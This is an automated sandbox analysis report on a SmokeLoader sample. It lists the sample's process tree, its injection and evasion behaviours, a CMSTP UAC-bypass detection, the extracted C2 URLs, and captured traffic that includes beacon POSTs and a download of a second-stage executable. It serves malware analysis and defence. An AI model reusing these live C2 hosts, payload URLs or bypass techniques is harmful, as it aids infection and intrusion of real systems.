Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:753427
MD5:44c87d3bc316eefe4dcbf66afed72abc
SHA1:96bde412ef761b4d53506ae4ed2999bc9dcaf137
SHA256:731e22be2a6b39304919dc24b750a720b23a0f1ed996a9b74cf0b088de6144b1
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5020 cmdline: C:\Users\user\Desktop\file.exe MD5: 44C87D3BC316EEFE4DCBF66AFED72ABC)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • B87E.exe (PID: 3316 cmdline: C:\Users\user\AppData\Local\Temp\B87E.exe MD5: 1BD9FB4ADE498938E6432D6C5D1E23A5)
        • rundll32.exe (PID: 2980 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • EBC4.exe (PID: 4608 cmdline: C:\Users\user\AppData\Local\Temp\EBC4.exe MD5: F06F222962C48BB7D822AC0FCD14CFD2)
  • gfgsrbs (PID: 5000 cmdline: C:\Users\user\AppData\Roaming\gfgsrbs MD5: 44C87D3BC316EEFE4DCBF66AFED72ABC)
  • EBC4.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Local\Temp\EBC4.exe" MD5: F06F222962C48BB7D822AC0FCD14CFD2)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        Click to see the 17 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        12.2.EBC4.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          12.2.EBC4.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x10170:$s2: Elevation:Administrator!new:
          7.2.EBC4.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            7.2.EBC4.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x10170:$s2: Elevation:Administrator!new:

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://piratia.su/tmp/URL Reputation: Label: malware
            Source: http://piratia.su/tmp/URL Reputation: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: freeshmex.atVirustotal: Detection: 18%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmpReversingLabs: Detection: 24%
            Source: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmpVirustotal: Detection: 35%Perma Link
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\gfgsrbsJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeJoe Sandbox ML: detected
            Source: 12.2.EBC4.exe.2d5112c.2.unpackAvira: Label: TR/Patched.Ren.Gen7
            Source: 5.2.B87E.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AFD42 CryptGetHashParam,CryptDestroyHash,5_2_004AFD42
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046A04E CryptEncrypt,5_2_0046A04E
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004E828B CryptEncrypt,5_2_004E828B
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AF42D CryptHashData,CryptHashData,5_2_004AF42D
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B74F7 CryptExportKey,5_2_004B74F7
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B6481 CryptExportKey,5_2_004B6481
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AE5BE CryptBinaryToStringA,5_2_004AE5BE
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B776F CryptReleaseContext,5_2_004B776F
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B3784 CryptDecrypt,5_2_004B3784
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A08 CryptImportKey,5_2_004C3A08
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3AD6 CryptDestroyKey,CryptDestroyKey,5_2_004C3AD6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3A88 CryptEncrypt,CryptEncrypt,5_2_004C3A88
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B3B61 CryptReleaseContext,5_2_004B3B61
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3B30 CryptReleaseContext,CryptReleaseContext,5_2_004C3B30
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AEBD6 CryptAcquireContextA,CryptAcquireContextA,5_2_004AEBD6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3D56 CryptBinaryToStringA,CryptBinaryToStringA,5_2_004C3D56
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004C3D04 CryptBinaryToStringA,CryptBinaryToStringA,5_2_004C3D04
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B2E2B CryptHashData,CryptHashData,5_2_004B2E2B
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B6ECB CryptExportKey,5_2_004B6ECB

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.507752658.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.489025318.0000000000413000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49715 version: TLS 1.2
            Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
            Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
            Source: C:\Windows\explorer.exeDomain query: freeshmex.at
            Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
            Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
            Source: Malware configuration extractorURLs: http://piratia.su/tmp/
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: Joe Sandbox ViewIP Address: 178.31.176.42 178.31.176.42
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Thu, 24 Nov 2022 19:13:08 GMTContent-Type: application/octet-streamContent-Length: 1041408Last-Modified: Thu, 24 Nov 2022 19:10:04 GMTConnection: keep-aliveETag: "637fc18c-fe400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 57 b6 e1 fb 13 d7 8f a8 13 d7 8f a8 13 d7 8f a8 ae 98 19 a8 12 d7 8f a8 0d 85 1a a8 0c d7 8f a8 0d 85 0c a8 96 d7 8f a8 34 11 f4 a8 1a d7 8f a8 13 d7 8e a8 87 d7 8f a8 0d 85 0b a8 3d d7 8f a8 0d 85 1b a8 12 d7 8f a8 0d 85 1e a8 12 d7 8f a8 52 69 63 68 13 d7 8f a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 67 92 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 9e 01 00 00 3a 30 00 00 00 00 00 e6 6f 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 0d 84 10 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c a0 01 00 64 00 00 00 00 80 31 00 e8 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 3c 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 9c 01 00 00 10 00 00 00 9e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 cf 2f 00 00 b0 01 00 00 12 0e 00 00 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 2e 00 00 00 80 31 00 00 30 00 00 00 b4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crimlvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdnuetf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jccvg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjuand.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugahgtu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: freeshmex.at
            Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbcxtvmmly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmhsk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxmexebq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvudclyoxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewydclhcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufwbup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dmwhplnj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrqcl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuvtnsw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fffclev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ykhdc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhcqdle.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bussc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rfiijpjae.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bowsudmxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slkwmgvhmh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpaefk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaymxpjge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfwtjemoof.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rpaquepn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uphkrwii.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mifwrnveyh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://motvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfgpwwck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agqugnol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxxlrwdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jhiornjar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sloljasy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: freeshmex.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrxav.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: freeshmex.at
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
            Source: unknownTCP traffic detected without corresponding DNS query: 123.253.32.170
